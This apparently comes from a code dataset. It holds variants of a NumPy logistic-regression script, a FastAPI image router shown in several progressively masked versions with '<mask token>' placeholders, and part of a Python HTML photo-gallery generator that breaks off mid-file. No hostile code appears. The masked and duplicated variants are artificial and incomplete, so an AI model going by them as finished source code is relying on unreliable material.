"step-4": "import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\nclass LogisticRegression:\n \"\"\"LogisticRegression for binary classification\n \n max_iter: the maximum iteration times for training\n learning_rate: learing rate for gradiend decsend training\n\n Input's shape should be [sample_nums, data_dims]\n\n attrs:\n max_iter\n learning_rate\n (after fit)\n w\n b\n costs\n\n methods:\n fit\n predict\n predict_proba\n score \n \"\"\"\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.\n max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n def __str__(self):\n return ('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n\nif __name__ == '__main__':\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n data = datasets.load_iris()\n x = data.data[:100, [0, 1]]\n y = np.array([(1 if i > 0 else 0) for i in data.target[:100]])\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n model = LogisticRegression()\n model.fit(x_train, y_train.reshape(len(y_train), -1), True)\n print('Train Score:{}'.format(model.score(x_train, y_train)))\n print('Test Score:{}'.format(model.score(x_test, y_test)))\n plt.subplot(211)\n x_samples = np.linspace(4, 7, 500)\n y_samples = (-model.b - model.w[0] * x_samples) / model.w[1]\n plt.plot(x_samples, y_samples, 'r')\n plt.scatter(x[:50, 0], x[:50, 1], label='negative')\n plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.title('LosRes Results on iris datasets')\n plt.legend()\n plt.subplots_adjust(hspace=0.5, wspace=0.25)\n plt.subplot(212)\n plt.plot(range(len(model.costs)), model.costs, '-o')\n plt.xlabel('steps')\n plt.ylabel('loss')\n plt.title('loss function')\n plt.show()\n",
"step-5": "import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\n\nclass LogisticRegression:\n '''LogisticRegression for binary classification\n \n max_iter: the maximum iteration times for training\n learning_rate: learing rate for gradiend decsend training\n\n Input's shape should be [sample_nums, data_dims]\n\n attrs:\n max_iter\n learning_rate\n (after fit)\n w\n b\n costs\n\n methods:\n fit\n predict\n predict_proba\n score \n '''\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'.format(\n self.learning_rate, self.max_iter))\n\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b \n\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y) \n\n assert (dw.shape == w.shape)\n assert (db.dtype == float)\n cost = np.squeeze(cost)\n assert (cost.shape == ())\n grads = {'dw': dw,\n 'db': db}\n\n return grads, cost\n\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter+1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f'%(i, cost))\n return w, b, costs\n\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n\n def __str__(self):\n return 'LogisticRegression Model(learning_rate={}, max_iteration={})'.format(\n self.learning_rate, self.max_iter)\n\n\nif __name__ == '__main__':\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n data = datasets.load_iris()\n x = data.data[:100, [0,1]]\n # x = np.hstack([np.ones((100, 1)), x])\n y = np.array([1 if i > 0 else 0 for i in data.target[:100]])\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n model = LogisticRegression()\n model.fit(x_train, y_train.reshape(len(y_train), -1), True)\n print('Train Score:{}'.format(model.score(x_train, y_train)))\n print('Test Score:{}'.format(model.score(x_test, y_test)))\n\n plt.subplot(211)\n x_samples = np.linspace(4, 7, 500)\n y_samples = (- model.b - model.w[0]*x_samples) / model.w[1]\n plt.plot(x_samples, y_samples, 'r')\n plt.scatter(x[:50, 0], x[:50, 1], label='negative')\n plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.title('LosRes Results on iris datasets')\n plt.legend()\n \n plt.subplots_adjust(hspace=0.5,wspace=0.25)\n plt.subplot(212)\n plt.plot(range(len(model.costs)), model.costs, '-o')\n plt.xlabel('steps')\n plt.ylabel('loss')\n plt.title('loss function')\n plt.show()",
"step-ids": [
7,
11,
13,
14,
15
]
}
|
[
7,
11,
13,
14,
15
] |
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, File
from typing import List
from ..models.database import ApiSession
from ..schemas.images_schema import ImageReturn
from . import image_service
router = APIRouter()
@router.get("/", response_model=List[ImageReturn])
def get_all_images(db: Session = Depends(ApiSession)):
return image_service.get_all_images(db)
@router.get("/{image_id}", response_model=ImageReturn)
def get_image_by_id(image_id: int, db: Session = Depends(ApiSession)):
return image_service.get_image_by_id(image_id, db)
@router.post("/name/{image_name}", response_model=List[ImageReturn])
def create_images(image_name: str, files: List[bytes] = File(...), db: Session = Depends(ApiSession)):
return image_service.create_images(image_name, files, db)
@router.delete("/{image_id}", response_model=None)
def delete_image_by_id(image_id: int, db: Session = Depends(ApiSession)):
return image_service.delete_image_by_id(image_id, db)
@router.delete("/", response_model=None)
def delete_images_by_ids(image_ids: List[int], db: Session = Depends(ApiSession)):
return image_service.delete_images_by_ids(image_ids, db)
|
normal
|
{
"blob_id": "874ca60749dba9ca8c8ebee2eecb1b80da50f11f",
"index": 3782,
"step-1": "<mask token>\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\[email protected]('/', response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session=Depends(ApiSession)\n ):\n return image_service.delete_images_by_ids(image_ids, db)\n",
"step-3": "<mask token>\nrouter = APIRouter()\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\[email protected]('/', response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session=Depends(ApiSession)\n ):\n return image_service.delete_images_by_ids(image_ids, db)\n",
"step-4": "from sqlalchemy.orm import Session\nfrom fastapi import APIRouter, Depends, File\nfrom typing import List\nfrom ..models.database import ApiSession\nfrom ..schemas.images_schema import ImageReturn\nfrom . import image_service\nrouter = APIRouter()\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\[email protected]('/', response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session=Depends(ApiSession)\n ):\n return image_service.delete_images_by_ids(image_ids, db)\n",
"step-5": "from sqlalchemy.orm import Session\nfrom fastapi import APIRouter, Depends, File\nfrom typing import List\n\nfrom ..models.database import ApiSession\nfrom ..schemas.images_schema import ImageReturn\n\nfrom . import image_service\n\nrouter = APIRouter()\n\[email protected](\"/\", response_model=List[ImageReturn])\ndef get_all_images(db: Session = Depends(ApiSession)):\n return image_service.get_all_images(db)\n\[email protected](\"/{image_id}\", response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session = Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\[email protected](\"/name/{image_name}\", response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes] = File(...), db: Session = Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\[email protected](\"/{image_id}\", response_model=None)\ndef delete_image_by_id(image_id: int, db: Session = Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\[email protected](\"/\", response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session = Depends(ApiSession)):\n return image_service.delete_images_by_ids(image_ids, db)",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""
Make html galleries from media directories. Organize by dates, by subdirs or by
the content of a diary file. The diary file is a markdown file organized by
dates, each day described by a text and some medias (photos and movies).
The diary file can be exported to:
* an html file with the text and subset of medias associated with each day,
* the previous html file extended with all medias in the media directory,
* an html file ready to import into Blogger.
"""
import sys
import os
import argparse
import glob
import shutil
import re
import io
import bisect
import locale
import textwrap
import base64
import datetime
import urllib
from configparser import ConfigParser
from collections import defaultdict
from subprocess import check_output, CalledProcessError, STDOUT
from urllib.request import urlopen
import colorama
import clipboard
import PIL
from PIL import Image, ImageChops
from lxml import objectify
import markdown
USAGE = """
galerie --gallery <root-dir> [--sourcedir <media-dir>]
[--bydir true|false*]
[--bydate true|false*]
[--diary true|false*]
[--recursive true|false*]
[--dates source*|diary|<yyyymmdd-yyyymmdd>]
[--github_pages true|false]
[--dest <directory>]
[--forcethumb]
galerie --update <root-dir>
galerie --create <root-dir> --sourcedir <media-dir>
[--recursive true|false*]
[--dates source*|<yyyymmdd-yyyymmdd>]
galerie --blogger <root-dir> --url <url>
[--check]
[--full]
[--dest <filename>]
Notes:
- * gives default
- all options can be abbreviated if there is no conflict with other options (--gallery --> --gal)
"""
# -- Post objects -------------------------------------------------------------
CAPTION_IMAGE_STYLE = '''\
<style type="text/css">
span { display:inline-table; }
</style>\
'''
STYLE = '''\
<style type="text/css">
p { margin-top:0px; margin-bottom:0px; }
h3 { font-size: 100%%; font-weight: bold; margin-top:0px; margin-bottom:0px; }
</style>
'''
START = f'''\
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>%s</title>
<link rel="icon" href="favicon.ico" />
<meta name="viewport" content="width=device-width">
<link rel="stylesheet" href="photobox/photobox.css">
<script src="photobox/jquery.min.js"></script>
<script src="photobox/jquery.photobox.js"></script>
{CAPTION_IMAGE_STYLE}
{STYLE}
</head>
<body>\
'''
BUTTONS = '''\
<button id="btn_full" type="button" style="position: fixed; width: 50px; top: 20px; right: 20px; background-color:white">Full</button>
<button id="btn_blog" type="button" style="position: fixed; width: 50px; top: 40px; right: 20px; background-color:white">Diary</button>
<button id="btn_text" type="button" style="position: fixed; width: 50px; top: 60px; right: 20px; background-color:white">Text</button>
<script>
$('#btn_full').click(function() {
$("[id^=gallery-blog]").show();
$("[id^=gallery-dcim]").show();
$("div.extra").show();
});
$('#btn_text').click(function() {
$("[id^=gallery-blog]").hide();
$("[id^=gallery-dcim]").hide();
$("div.extra").hide();
});
$('#btn_blog').click(function() {
$("[id^=gallery-blog]").show();
$("[id^=gallery-dcim]").hide();
$("div.extra").hide();
});
</script>
'''
SUBDIR_BACKCOL = '#eee'
END = '</body>\n</html>'
SEP = '<hr color="#C0C0C0" size="1" />'
IMGPOST = '<a href="%s"><img src="%s" width="%d" height="%d" title="%s"/></a>'
VIDPOST = '<a href="%s" rel="video"><img src="%s" width="%d" height="%d" title="%s"/></a>'
IMGPOSTCAPTION = '''\
<span>
<a href="%s"><img src=%s width="%d" height="%d" title="%s"/></a>
<p>%s</p>
</span>
'''
VIDPOSTCAPTION = '''\
<span>
<a href="%s" rel="video"><img src=%s width="%d" height="%d" title="%s"/></a>
<p>%s</p>
</span>
'''
IMGDCIM = '<a href="%s"><img src="%s" width="%d" height="%d" title="%s"/></a>'
VIDDCIM = '<a href="%s" rel="video"><img src="%s" width="%d" height="%d" title="%s"/></a>'
# diminution de l'espace entre images, on utilise :
# "display: block;", "margin-bottom: 0em;" et "font-size: 0;"
# "display: block;" dans img : espacement correct ordi mais pas centré téléphone
# "display: block;" dans a : ok
DIRPOST = '<a href="%s"><img src="%s" width="%d" height="%d" style="border: 1px solid #C0C0C0;" /></a>'
DIRPOSTCAPTION = f'''
<span style="background-color:{SUBDIR_BACKCOL}; margin-bottom: 8px; border: 1px solid #C0C0C0;">
<a href="%s"><img src="%s" width="%d" height="%d" style="border: 1px solid #C0C0C0;" /></a>
<p style="margin-left:2px;">%s</p>
</span>
'''
BIMGPAT = '''\
<div class="separator" style="clear: both; text-align: center;">
<a href="%s" style="clear: left; margin-bottom: 0em; margin-right: 1em; font-size: 0; display: block;">
<img border="0" src="%s" width="640" />
</a></div>
'''
CAPTION_PAT = '''\
<div class="separator" style="clear: both; text-align: center;">
%s
</div>
'''
class Post:
def __init__(self, date, text, medias):
# date: yyyymmdd
self.date = date
self.text = text
self.medias = medias
self.dcim = []
self.daterank = 0
self.extra = False
def __lt__(self, other):
return self.date < other.date
@classmethod
def from_markdown(cls, post):
m = re.match(r'\[(\d\d\d\d/\d\d/\d\d)\]\n*', post[0])
if m:
date = m.group(1).replace('/', '')
if not validate_date(date):
error('Incorrect date value:', date)
del post[0]
else:
error('No date in post', ' '.join(post))
while post and not post[0].strip():
del post[0]
text = ''
while post and not re.match(r'!?\[\]', post[0]):
text += post[0]
del post[0]
# remove empty lines at end
text = re.sub(r'\n\n$', '\n', text)
medias = list()
while post and (match := re.match(r'!?\[\]\((.*)\)', post[0])):
media = match.group(1)
caption = None
del post[0]
if post and not re.match(r'!?\[\]', post[0]):
caption = post[0].strip()
del post[0]
if match.group(0)[0] == '!':
medias.append(PostImage(caption, media))
else:
medias.append(PostVideo(caption, media))
return cls(date, text, medias)
@classmethod
def from_date(cls, date):
dt = datetime.datetime.strptime(date, '%Y%m%d')
datetext = dt.strftime("%A %d %B %Y").capitalize()
post = cls(date, text=datetext, medias=[])
post.daterank = 1
return post
def to_html(self, args, target='regular'):
if target == 'regular':
if args.diary:
return self.to_html_diary(args)
else:
return self.to_html_regular(args)
if target == 'blogger':
return self.to_html_blogger()
def to_html_regular(self, args):
html = list()
if self.text:
# possible with --bydate
html.append(markdown.markdown(self.text))
subdirs, dcim = dispatch_post_items(self.dcim)
if self.dcim:
html.append(SEP)
for media in subdirs:
html.append(media.to_html_dcim(args))
if dcim:
html.append(f'<div id="gallery-dcim-{self.date}-{self.daterank}">')
for media in dcim:
html.append(media.to_html_dcim(args))
html.append('</div>')
html.append(SEP)
return html
def to_html_diary(self, args):
html = list()
if self.extra:
html.append('<div class="extra">')
if self.text:
html.append(markdown.markdown(self.text))
if self.medias:
html.append(f'<div id="gallery-blog-{self.date}-{self.daterank}">')
for media in self.medias:
html.append(media.to_html_post(args))
html.append('</div>')
_, dcim = dispatch_post_items(self.dcim)
if dcim:
html.append(f'<div id="gallery-dcim-{self.date}-{self.daterank}">')
html.append(SEP)
for media in dcim:
html.append(media.to_html_dcim(args))
html.append('</div>')
html.append(SEP)
if self.extra:
html.append('</div>')
return html
def to_html_blogger(self):
html = list()
html.append(markdown.markdown(self.text))
for image in self.medias:
html.append(image.to_html_blogger())
html.append(SEP)
return html
class PostItem:
def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):
self.caption = caption
self.uri = uri
self.basename = os.path.basename(uri)
self.thumb = thumb
self.thumbsize = thumbsize
self.descr = descr
self.resized_url = None
class PostImage(PostItem):
def to_markdown(self):
if not self.caption:
return '' % (self.uri,)
else:
return '\n%s' % (self.uri, self.caption)
def to_html_post(self, args):
descr = self.descr if args.thumbnails.media_description else ''
if not self.caption:
return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)
else:
return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)
def to_html_dcim(self, args):
descr = self.descr if args.thumbnails.media_description else ''
return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)
def to_html_blogger(self):
if not self.caption:
return BIMGPAT % (self.uri, self.resized_url)
else:
return f'{BIMGPAT}\n{CAPTION_PAT}' % (self.uri, self.resized_url, self.caption)
class PostVideo(PostItem):
def to_markdown(self):
if not self.caption:
return '[](%s)' % (self.uri,)
else:
return '[](%s)\n%s' % (self.uri, self.caption)
def to_html_post(self, args):
descr = self.descr if args.thumbnails.media_description else ''
if not self.caption:
return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)
else:
return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)
def to_html_dcim(self, args):
descr = self.descr if args.thumbnails.media_description else ''
return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)
def to_html_blogger(self):
x = f'<p style="text-align: center;">{self.iframe}</p>'
if not self.caption:
return x
else:
return f'%s\n{CAPTION_PAT}' % (x, self.caption)
class PostSubdir(PostItem):
def to_html_dcim(self, args):
basename = os.path.basename(self.htmname)
posts = self.posts
title = self.caption
print_html(args, posts, title, self.htmname)
if not self.caption:
return DIRPOST % (basename, self.thumb, *self.thumbsize)
else:
return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize, self.caption)
def relative_url(path, root):
"""
returns a normalized url to path relative from root
"""
try:
url = os.path.relpath(path, root)
except:
error('Unable to make a relative url:', url, root)
url = url.replace('\\', '/') if os.sep == '\\' else url
return urllib.parse.quote(url)
# -- Markdown parser ----------------------------------------------------------
def parse_markdown(filename):
"""
Generate Post objects from markdown. Date must be present in each post and
posts must be ordrered by date.
"""
if not os.path.exists(filename):
error('File not found', filename)
posts = list()
with open(filename, encoding='utf-8') as f:
line = next(f)
if line.startswith('# '):
title = line[2:].strip()
record = []
next(f)
else:
title = None
record = [line]
for line in f:
if not line.startswith('___'):
record.append(line)
else:
posts.append(Post.from_markdown(record))
record = []
# set rank of posts in date
daterank = defaultdict(int)
for post in posts:
daterank[post.date] += 1
post.daterank = daterank[post.date]
# check post order
for post1, post2 in zip(posts[:-1], posts[1:]):
if post1.date > post2.date:
error('Posts are not ordered', f'{post1.date} > {post2.date}')
return title, posts
# -- Markdown printer ---------------------------------------------------------
def print_markdown(posts, title, fullname):
with open(fullname, 'wt', encoding='utf-8') as fdst:
print(f'# {title}\n', file=fdst)
for post in posts:
date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'
print(date, file=fdst)
if post.text:
print(file=fdst)
for line in post.text.splitlines():
if not line:
print(file=fdst)
else:
for chunk in textwrap.wrap(line, width=78):
print(chunk, file=fdst)
if post.medias:
print(file=fdst)
for media in post.medias:
print(media.to_markdown(), file=fdst)
print('______', file=fdst)
# -- html printer -------------------------------------------------------------
def compose_html_reduced(args, posts, title, target):
html = list()
html.append(START % title)
for post in posts:
for line in post.to_html(args, target):
html.append(line.strip())
html.append('')
html.append(END)
return html
def compose_html_full(args, posts, title, target):
html = list()
html.append(START % title)
if args.diary:
html.append(BUTTONS)
for post in posts:
for line in post.to_html(args, target):
html.append(line.strip())
html.append('')
html.append('<script>')
for post in posts:
if post.medias:
gallery_id = f'gallery-blog-{post.date}-{post.daterank}'
html.append(gallery_call(args, gallery_id))
if post.dcim:
gallery_id = f'gallery-dcim-{post.date}-{post.daterank}'
html.append(gallery_call(args, gallery_id))
html.append('</script>')
html.append(END)
return html
def print_html_to_stream(args, posts, title, stream, target):
if target == 'regular':
for line in compose_html_full(args, posts, title, target):
print(line, file=stream)
else:
for line in compose_html_reduced(args, posts, title, target):
print(line, file=stream)
def print_html(args, posts, title, html_name, target='regular'):
assert target in ('regular', 'blogger')
with io.StringIO() as f:
print_html_to_stream(args, posts, title, f, target)
html = f.getvalue()
if html_name:
if os.path.exists(html_name):
# test if the generated html is identical to the one already on disk
with open(html_name, 'rt', encoding='utf-8') as f:
html0 = f.read()
if html == html0:
return None
with open(html_name, 'wt', encoding='utf-8') as f:
f.write(html)
return None
else:
return html
GALLERYCALL = """
$('#%s').photobox('a', {
loop:%s,
thumbs:%s,
autoplay:%s,
time:%d,
zoomable:%s ,
rotatable:%s,
wheelNextPrev:%s
});
"""
def gallery_call(args, gallery_id):
return GALLERYCALL.replace('\n', '') % (
gallery_id,
str(args.photobox.loop).lower(),
str(args.photobox.thumbs).lower(),
str(args.photobox.autoplay).lower(),
args.photobox.time,
str(args.photobox.zoomable).lower(),
str(args.photobox.rotatable).lower(),
str(args.photobox.wheelNextPrev).lower(),
)
# -- Media description --------------------------------------------------------
def is_image_file(name):
return os.path.splitext(name)[1].lower() in (
'.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp', '.tif'
)
def is_video_file(name):
return os.path.splitext(name)[1].lower() in (
'.mp4', '.webm', '.mkv', '.flv', '.m4v', '.avi', '.wmv', '.mts', '.vob', '.divx'
)
def is_media(name):
return is_image_file(name) or is_video_file(name)
def validate_date(datestr):
# datestr = yyyymmdd
try:
datetime.datetime.strptime(datestr, '%Y%m%d')
return True
except ValueError:
return False
def date_from_name(name):
# heuristics
if match := re.search(r'(?:\D|^)(\d{8})(?:\D|$)', name, re.ASCII):
digits = match.group(1)
if validate_date(digits):
return digits
return None
def date_from_item(filename):
if date := date_from_name(filename):
return date
else:
timestamp = os.path.getmtime(filename)
return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')
def time_from_name(name):
# heuristics
if match := re.search(r'(?:\D|^)(\d{8})\D(\d{6})(?:\D|$)', name, re.ASCII):
digits = match.group(2)
hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits[4:6])
if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:
return digits
return None
def time_from_item(filename):
if time := time_from_name(filename):
return time
else:
timestamp = os.path.getmtime(filename)
return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')
FFPROBE_CMD = '''\
ffprobe -v error
-select_streams v:0
-show_entries stream=width,height,avg_frame_rate,r_frame_rate:format=duration
-of csv=p=0
'''
def get_image_info(filename):
date = date_from_item(filename)
time = time_from_item(filename)
img = Image.open(filename)
width, height = img.size
size = round(os.path.getsize(filename) / 1e6, 1)
return (date, time, width, height, size), f'{date} {time}, dim={width}x{height}, {size} MB'
def get_video_info(filename, info_fullname):
if os.path.exists(info_fullname):
with open(info_fullname) as f:
info = f.readline().split()
date, time, width, height, size, duration, fps = info[0], info[1], int(info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6])
formatted_info = format_video_info(date, time, width, height, size, duration, fps)
return (date, time, width, height, size, duration, fps), formatted_info
else:
info, formatted_info = make_video_info(filename, info_fullname)
with open(info_fullname, 'wt') as f:
print(' '.join([str(_) for _ in info]), file=f)
return info, formatted_info
def make_video_info(filename, info_fullname):
# ffmpeg must be in path
date = date_from_item(filename)
time = time_from_item(filename)
command = [*FFPROBE_CMD.split(), filename]
try:
output = check_output(command, stderr=STDOUT).decode()
width, height, fps, duration = parse_ffprobe_output(output)
size = round(os.path.getsize(filename) / 1e6, 1)
output = format_video_info(date, time, width, height, size, duration, fps)
except CalledProcessError as e:
output = e.output.decode()
warning(output)
raise
return (date, time, width, height, size, duration, fps), output
def parse_ffprobe_output(ffprobe_output):
# parse first channel data and last line for duration
match = re.match(r'(\d+),(\d+),(\d+)/(\d+),(\d+/\d+).*\s(\d+\.\d+)', ffprobe_output, re.DOTALL)
width = int(match.group(1))
height = int(match.group(2))
fps = round(int(match.group(3)) / int(match.group(4)), 1)
duration = round(float(match.group(6)))
return width, height, fps, duration
def format_video_info(date, time, width, height, size, duration, fps):
return f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'
def format_duration(duration):
mn = duration // 60
sec = duration % 60
if mn <= 59:
return f'm:s={mn:02}:{sec:02}'
else:
hour = mn // 60
mn = mn % 60
return f'h:m:s={hour:02}:{mn:02}:{sec:02}'
# -- Thumbnails (image and video) ---------------------------------------------
def thumbname(name, key):
return key + '-' + name + '.jpg'
def size_thumbnail(width, height, maxdim):
if width >= height:
return maxdim, int(round(maxdim * height / width))
else:
return int(round(maxdim * width / height)), maxdim
def make_thumbnail_image(args, image_name, thumb_name, size):
if os.path.exists(thumb_name) and args.forcethumb is False:
pass
else:
print('Making thumbnail:', thumb_name)
create_thumbnail_image(image_name, thumb_name, size)
def create_thumbnail_image(image_name, thumb_name, size):
imgobj = Image.open(image_name)
if (imgobj.mode != 'RGBA'
and image_name.endswith('.jpg')
and not (image_name.endswith('.gif') and imgobj.info.get('transparency'))
):
imgobj = imgobj.convert('RGBA')
imgobj.thumbnail(size, Image.LANCZOS)
imgobj = imgobj.convert('RGB')
imgobj.save(thumb_name)
def make_thumbnail_video(args, video_name, thumb_name, size, duration):
if os.path.exists(thumb_name) and args.forcethumb is False:
pass
else:
print('Making thumbnail:', thumb_name)
create_thumbnail_video(args, video_name, thumb_name, size, duration)
# base64 video.png
VIDEO_ICON = '''\
iVBORw0KGgoAAAANSUhEUgAAABgAAAAUCAAAAACy3qJfAAAA4UlEQVR4
2m1QoRbCMAy88SaK69xscfuEWiS4SZBIcCCRfAL8An8AcnJzTOJSWdxwzJXSPUoHRPQlueYuucigxm
9kDGaMf8AjopGcYn8LmmyLoihBWBiThb+5MTuUsc3aL56upneZ9sByAIg8Z8BEn96EeZ65iU7DvmbP
